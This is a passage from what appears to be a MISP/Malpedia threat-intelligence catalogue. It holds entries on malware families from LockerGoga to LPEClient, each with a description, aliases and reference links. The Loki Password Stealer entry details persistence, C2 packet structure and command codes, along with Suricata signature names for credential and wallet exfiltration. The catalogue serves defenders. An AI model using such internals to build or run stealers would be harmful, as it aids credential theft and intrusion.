https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-lockbit

https://www.zdnet.com/article/ransomware-hits-helicopter-maker-kopter/

https://medium.com/@amgedwageh/lockbit-ransomware-analysis-notes-93a542fc8511

https://www.lemagit.fr/actualites/252516821/Ransomware-LockBit-30-commence-a-etre-utilise-dans-des-cyberattaques

https://github.com/prodaft/malware-ioc/tree/master/PTI-257

https://www.cisa.gov/sites/default/files/2023-06/aa23-165a_understanding_TA_LockBit_0.pdf

https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf

https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/481/original/010421_LockBit_Interview.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt

https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/

https://ke-la.com/lockbit-2-0-interview-with-russian-osint/

https://asec.ahnlab.com/en/41450/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments

https://techcommunity.microsoft.com/t5/security-compliance-and-identity/part-2-lockbit-2-0-ransomware-bugs-and-database-recovery/ba-p/3254421

https://www.bleepingcomputer.com/news/security/energy-group-erg-reports-minor-disruptions-after-ransomware-attack/

https://www.connectwise.com/resources/lockbit-profile

https://socradar.io/lockbit-3-another-upgrade-to-worlds-most-active-ransomware/

https://resources.prodaft.com/wazawaka-report

https://security.packt.com/understanding-lockbit/

https://www.logpoint.com/en/blog/hunting-lockbit-variations-using-logpoint/

https://news.sophos.com/en-us/2022/04/12/attackers-linger-on-government-agency-computers-before-deploying-lockbit-ransomware/

https://asec.ahnlab.com/ko/39682/

https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/

https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html

https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/

https://seguranca-informatica.pt/malware-analysis-details-on-lockbit-ransomware/

https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom

https://amgedwageh.medium.com/lockbit-ransomware-analysis-notes-93a542fc8511

https://www.trendmicro.com/en_no/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html

https://analyst1.com/ransomware-diaries-volume-1/

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://www.seqrite.com/blog/indian-power-sector-targeted-with-latest-lockbit-3-0-variant/

https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html

https://www.glimps.fr/dcouverte-dune-nouvelle-version-du-ramsomware-lockbit/

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://blog.minerva-labs.com/lockbit-3.0-aka-lockbit-black-is-here-with-a-new-icon-new-ransom-note-new-wallpaper-but-less-evasiveness

https://securelist.com/modern-ransomware-groups-ttps/106824/

https://cluster25.io/2022/07/06/lockbit-3-0-making-the-ransomware-great-again/

https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/

https://id-ransomware.blogspot.com/search?q=lockbit

https://github.com/EmissarySpider/ransomware-descendants

https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/

https://securityaffairs.com/141666/cyber-crime/lockbit-green-ransomware-variant.html

https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/

https://www.cybereason.com/blog/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool

https://therecord.media/conti-ransomware-gang-chats-leaked-by-pro-ukraine-member/

https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants

https://www.netskope.com/blog/netskope-threat-coverage-lockbit

https://medium.com/s2wblog/quick-overview-of-leaked-lockbit-3-0-black-builder-program-880ae511d085

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://news.sophos.com/en-us/2020/10/21/lockbit-attackers-uses-automated-attack-tools-to-identify-tasty-targets

https://securelist.com/crimeware-report-lockbit-switchsymb/110068/

https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/

https://www.coveware.com/blog/2022/1/26/ransomware-as-a-service-innovation-curve

https://www.crowdstrike.com/blog/how-crowdstrike-prevents-volume-shadow-tampering-by-lockbit-ransomware/

https://research.loginsoft.com/threat-research/taming-the-storm-understanding-and-mitigating-the-consequences-of-cve-2023-27350/

https://skyblue.team/posts/hive-recovery-from-lockbit-2.0/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1

https://redcanary.com/blog/intelligence-insights-november-2021/

https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor

https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/

https://securityintelligence.com/posts/lockbit-ransomware-attacks-surge-affiliate-recruitment/

https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound

https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/

https://www.dr.dk/nyheder/viden/teknologi/frygtede-skulle-lukke-alle-vindmoeller-nu-aabner-vestas-op-om-hacking-angreb

https://www.fortinet.com/blog/threat-research/emerging-lockbit-campaign

https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/

https://www.intrinsec.com/alphv-ransomware-gang-analysis

https://www.sentinelone.com/labs/lockbit-3-0-update-unpicking-the-ransomwares-latest-anti-analysis-and-evasion-techniques/

https://www.seqrite.com/blog/uncovering-lockbit-blacks-attack-chain-and-anti-forensic-activity/

https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1

https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/

https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html

https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/

https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/

https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/

https://news.sophos.com/en-us/2022/11/30/lockbit-3-0-black-attacks-and-leaks-reveal-wormable-capabilities-and-tooling/

https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/

https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/

https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-claims-attack-on-bridgestone-americas/

https://unit42.paloaltonetworks.com/lockbit-2-ransomware/

https://www.crypsisgroup.com/insights/ransomwares-new-trend-exfiltration-and-extortion

https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf

https://asec.ahnlab.com/en/35822/

https://intel471.com/blog/privateloader-malware

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://techcommunity.microsoft.com/t5/security-compliance-and-identity/part-1-lockbit-2-0-ransomware-bugs-and-database-recovery/ba-p/3254354

LockerGoga

According to Trend Micro, LockerGoga is a ransomware that has been used in multiple attacks, most notably against Altran Technologies and Norsk Hydro. It encrypts a range of documents and source code files but certain versions had little to no whitelist that would protect import system files such as the Windows Boot Manager.

The tag is: misp-galaxy:malpedia="LockerGoga"

LockerGoga is also known as:

Table 3896. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga

https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html

https://blog.talosintelligence.com/lockergoga/

https://dragos.com/wp-content/uploads/Spyware-Stealer-Locker-Wiper-LockerGoga-Revisited.pdf

https://www.abuse.io/lockergoga.txt

https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/

https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://content.fireeye.com/m-trends/rpt-m-trends-2020

https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/

https://www.helpnetsecurity.com/2019/04/02/aurora-decrypter-mira-decrypter/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot

https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880

https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/

https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/

https://www.youtube.com/watch?v=o6eEN0mUakM

LockFile

A ransomware first observed in July 2021.

The tag is: misp-galaxy:malpedia="LockFile"

LockFile is also known as:

Table 3897. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lockfile

https://decoded.avast.io/threatintel/decryptor-for-atomsilo-and-lockfile-ransomware/

https://www.csoonline.com/article/3631517/lockfile-ransomware-uses-intermittent-encryption-to-evade-detection.html

https://news.sophos.com/en-us/2021/08/27/lockfile-ransomwares-box-of-tricks-intermittent-encryption-and-evasion/

https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader

https://news.sophos.com/en-us/2021/08/23/proxyshell-vulnerabilities-in-microsoft-exchange-what-to-do/

https://thehackernews.com/2021/08/lockfile-ransomware-bypasses-protection.html

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows

https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://nsfocusglobal.com/insights-into-ransomware-spread-using-exchange-1-day-vulnerabilities-1-2/

https://twitter.com/VirITeXplorer/status/1428750497872232459

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/

Locky

Locky is a high profile ransomware family that first appeared in early 2016 and was observed being active until end of 2017. It encrypts files on the victim system and asks for ransom in order to have back original files. In its first version it added a .locky extension to the encrypted files, and in recent versions it added the .lukitus extension. The ransom amount is defined in BTC and depends on the actor.

The tag is: misp-galaxy:malpedia="Locky"

Locky is also known as:

Table 3898. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.locky

http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html

https://thisissecurity.stormshield.com/2018/03/20/de-obfuscating-jump-chains-with-binary-ninja/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks

https://threatpost.com/ransomware-gang-arrested-locky-hospitals/155842/

https://dissectingmalwa.re/picking-locky.html

https://vixra.org/pdf/2002.0183v1.pdf

http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html

https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/

https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/

https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/

https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf

https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html

https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/

https://intel471.com/blog/a-brief-history-of-ta505

Locky (Decryptor)

The tag is: misp-galaxy:malpedia="Locky (Decryptor)"

Locky (Decryptor) is also known as:

Table 3899. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor

Locky Loader

For the lack of a better name, this is a VBS-based loader that was used in beginning of 2018 to deliver win.locky.

The tag is: misp-galaxy:malpedia="Locky Loader"

Locky Loader is also known as:

Table 3900. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_loader

Loda

Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.

The tag is: misp-galaxy:malpedia="Loda"

Loda is also known as:

  • LodaRAT

  • Nymeria

Table 3902. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.loda

https://blog.talosintelligence.com/attributing-yorotrooper/

https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html

https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/

https://ti.qianxin.com/blog/articles/Kasablanka-Group-Probably-Conducted-Compaigns-Targeting-Russia/

https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware

https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/

https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html

https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel

https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html

https://blog.talosintelligence.com/get-a-loda-this/

https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA

https://www.silentpush.com/blog/more-lodarat-infrastructure-targeting-bangladesh-uncovered

LokiLocker

LokiLocker is a .Net ransomware, which was seen first in August 2021. This malware is protected with NETGuard (modified ConfuserEX) using the additional KoiVM virtualization plugin. The victims were observed ti be scattered around the world, with main concentation in Estern Europe and Asia (BlackBerry).

The tag is: misp-galaxy:malpedia="LokiLocker"

LokiLocker is also known as:

Table 3908. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lokilocker

https://asec.ahnlab.com/en/52570/

https://blogs.blackberry.com/en/2022/03/lokilocker-ransomware

https://www.theregister.com/2022/03/16/blackberry_lokilocker_ransomware/

https://www.msspalert.com/cybersecurity-research/lokilocker-ransomware-may-use-false-flag-to-avoid-identification/

Loki Password Stealer (PWS)

"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMe

Loki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.

Loki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.

The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.

Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\ C98066\”.

There can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:

FILE EXTENSION FILE DESCRIPTION .exe A copy of the malware that will execute every time the user account is logged into .lck A lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts .hdb A database of hashes for data that has already been exfiltrated to the C2 server .kdb A database of keylogger data that has yet to be sent to the C2 server

If the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.

The first packet transmitted by Loki-Bot contains application data.

The second packet transmitted by Loki-Bot contains decrypted Windows credentials.

The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.

Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.

The first WORD of the HTTP Payload represents the Loki-Bot version.

The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:

BYTE PAYLOAD TYPE 0x26 Stolen Cryptocurrency Wallet 0x27 Stolen Application Data 0x28 Get C2 Commands from C2 Server 0x29 Stolen File 0x2A POS (Point of Sale?) 0x2B Keylogger Data 0x2C Screenshot

The 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!

Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.

The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.

Loki-Bot can accept the following instructions from the C2 Server:

BYTE INSTRUCTION DESCRIPTION 0x00 Download EXE & Execute 0x01 Download DLL & Load #1 0x02 Download DLL & Load #2 0x08 Delete HDB File 0x09 Start Keylogger 0x0A Mine & Steal Data 0x0E Exit Loki-Bot 0x0F Upgrade Loki-Bot 0x10 Change C2 Polling Frequency 0x11 Delete Executables & Exit

Suricata Signatures RULE SID RULE NAME 2024311 ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected 2024312 ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1 2024313 ET TROJAN Loki Bot Request for C2 Commands Detected M1 2024314 ET TROJAN Loki Bot File Exfiltration Detected 2024315 ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1 2024316 ET TROJAN Loki Bot Screenshot Exfiltration Detected 2024317 ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2 2024318 ET TROJAN Loki Bot Request for C2 Commands Detected M2 2024319 ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2

The tag is: misp-galaxy:malpedia="Loki Password Stealer (PWS)"

Loki Password Stealer (PWS) is also known as:

  • Burkina

  • Loki

  • LokiBot

  • LokiPWS

Table 3909. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-urls-in-spam-part-2/

https://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html

https://cybergeeks.tech/how-to-expose-a-potential-cybercriminal-due-to-misconfigurations/

https://ivanvza.github.io/posts/lokibot_analysis

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/spammed-png-file-hides-lokibot/

https://isc.sans.edu/diary/27282

https://www.infoblox.com/wp-content/uploads/infoblox-whitepaper-deep-analysis-of-a-recent-lokibot-attack.pdf

https://lab52.io/blog/a-twisted-malware-infection-chain/

https://github.com/R3MRUM/loki-parse

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://www.lac.co.jp/lacwatch/report/20220307_002893.html

https://www.youtube.com/watch?v=-FxyzuRv6Wg

https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html

http://reversing.fun/posts/2021/06/08/lokibot.html

https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file

https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter

https://phishme.com/loki-bot-malware/

https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf

https://malcat.fr/blog/reversing-a-nsis-dropper-using-quick-and-dirty-shellcode-emulation/

https://www.atomicmatryoshka.com/post/malware-headliners-lokibot

https://medium.com/@paul.k.burbage/the-tale-of-the-pija-droid-firefinch-4d304fde5ca2

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf

https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/

http://reversing.fun/reversing/2021/06/08/lokibot.html

https://www.youtube.com/watch?v=N0wAh26wShE

https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850

https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://marcoramilli.com/2019/10/28/sweed-targeting-precision-engineering-companies-in-italy/

https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/

https://securityintelligence.com/posts/roboski-global-recovery-automation/

http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html

https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/

https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/

https://malcat.fr/blog/statically-unpacking-a-simple-net-dropper/

https://www.lastline.com/blog/password-stealing-malware-loki-bot/

https://isc.sans.edu/diary/24372

https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://www.fortinet.com/blog/threat-research/lokibot-targets-microsoft-office-document-using-vulnerabilities-and-macros

https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html

https://news.sophos.com/en-us/2020/05/14/raticate/

https://www.virusbulletin.com/virusbulletin/2020/02/lokibot-dissecting-cc-panel-deployments/

https://www.youtube.com/watch?v=K3Yxu_9OUxU

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://cybergeeks.tech/how-to-expose-a-potential-cybercriminal-due-to-misconfigurations

https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html

https://securelist.com/loki-bot-stealing-corporate-passwords/87595/

http://www.malware-traffic-analysis.net/2017/06/12/index.html

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/loki-info-stealer-propagates-through-lzh-files

https://clickallthethings.wordpress.com/2020/03/31/lokibot-getting-equation-editor-shellcode/

https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads

Lokorrito

According to ESET, this is a banking trojan that was active mainly in Mexico until the beginning of 2020, with builds for Brazil, Chile, and Colombia also having been identified.

The tag is: misp-galaxy:malpedia="Lokorrito"

Lokorrito is also known as:

Table 3910. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lokorrito

https://www.welivesecurity.com/2021/12/15/dirty-dozen-latin-america-amavaldo-zumanek/

LONGWATCH

The primary function of LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Windows temp folder.

The tag is: misp-galaxy:malpedia="LONGWATCH"

LONGWATCH is also known as:

Table 3912. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.longwatch

https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html

https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae

looChiper

LooChiper is a Ransomware. It uses a nice but scary name: LooCipher. The name is at the same time an allusion to its capabilities (thank to the term “Cipher”) and to the popular mythological figure, Lucifer. Despite its evocative nickname, the functionalities of this malware are pretty straight forward, not very different from those belonging to many other ransomware families.

The tag is: misp-galaxy:malpedia="looChiper"

looChiper is also known as:

Table 3913. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.loochiper

L0rdix

L0rdix is a multipurpose .NET remote access tool (RAT) first discovered being sold on underground forums in November 2018. Out of the box, L0rdix supports eight commands, although custom commands can be defined and added. These include:

Download and execute Update Open page (visible) Open page (invisible) Cmd Kill process Upload file HTTP Flood

L0rdix can extract credentials from common web browsers and steal data from crypto wallets and a target’s clipboard. Optionally, L0rdix can deploy a cryptominer (XMRig) to its bots.

The tag is: misp-galaxy:malpedia="L0rdix"

L0rdix is also known as:

  • lordix

Table 3915. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lordix

https://blog.ensilo.com/l0rdix-attack-tool

https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/decrypt_l0rdix_c2.py

https://www.bromium.com/decrypting-l0rdix-rats-c2/

https://twitter.com/hexlax/status/1058356670835908610

https://www.bromium.com/an-analysis-of-l0rdix-rat-panel-and-builder/

Lorenz

Tesorion describes Lorenz as a ransomware with design and implementation flaws, leading to impossible decryption with tools provided by the attackers. A free decryptor for 2021 versions was made available via the NoMoreRansom initiative. A new version of the malware was discovered in March 2022, for which again was provided a free decryptor, while the ransomware operators are not able to provide tools to decrypt affected files.

The tag is: misp-galaxy:malpedia="Lorenz"

Lorenz is also known as:

Table 3916. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lorenz

https://therecord.media/free-decrypter-available-for-lorenz-ransomware/

https://www.tesorion.nl/en/posts/lorenz-ransomware-analysis-and-a-free-decryptor/

https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware

https://arcticwolf.com/resources/blog/lorenz-ransomware-getting-dumped/

https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/

https://twitter.com/AltShiftPrtScn/status/1423190900516302860?s=20

https://www.tesorion.nl/en/posts/lorenz-ransomware-rebound-corruption-and-irrecoverable-files/

https://www.bleepingcomputer.com/news/security/meet-lorenz-a-new-ransomware-gang-targeting-the-enterprise/

Loup

Frank Boldewin describes Loup as a small cli-tool to cash out NCR devices (ATM).

The tag is: misp-galaxy:malpedia="Loup"

Loup is also known as:

Table 3917. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.loup

https://twitter.com/Arkbird_SOLG/status/1295396936896438272

https://twitter.com/r3c0nst/status/1295275546780327936

LOWBALL

LOWBALL, uses the legitimate Dropbox cloud-storage service to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.

The tag is: misp-galaxy:malpedia="LOWBALL"

LOWBALL is also known as:

Table 3918. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball

https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html

https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/

https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/

LPEClient

LPEClient is an HTTP(S) downloader that expects two command line parameters: an encrypted string containing two URLs (a primary and a secondary C&C server), and the path on the victim’s file system to store the downloaded payload.

It sends detailed information about the victim’s environment, like computer name, type and number of processors, computer manufacturer, product name, major and minor Windows versions, architecture, memory information, installed security software and the version of the ntoskrnl.exe from its version-information resource.

LPEClient uses specific 32-bit values to represent its execution state (0x59863F09 when connecting via the WinHTTP interface, 0xA9348B57 via WinINet), or the nature of HTTP requests to the C&C servers (0xF07D6B34 when sending system information, 0xEF8C0D51 when requesting a DLL payload, 0xCB790A25 when reporting the successful loading of the DLL, 0xD7B20A96 when reporting the state of the the DLL execution). As the final step, malware looks for the export CloseEnv and executes it.

The tag is: misp-galaxy:malpedia="LPEClient"

LPEClient is also known as:

  • LPEClientTea

Table 3921. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lpeclient

https://securelist.com/unveiling-lazarus-new-campaign/110888/

https://securelist.com/lazarus-threatneedle/100803/

https://vblocalhost.com/uploads/VB2021-Lee-etal.pdf

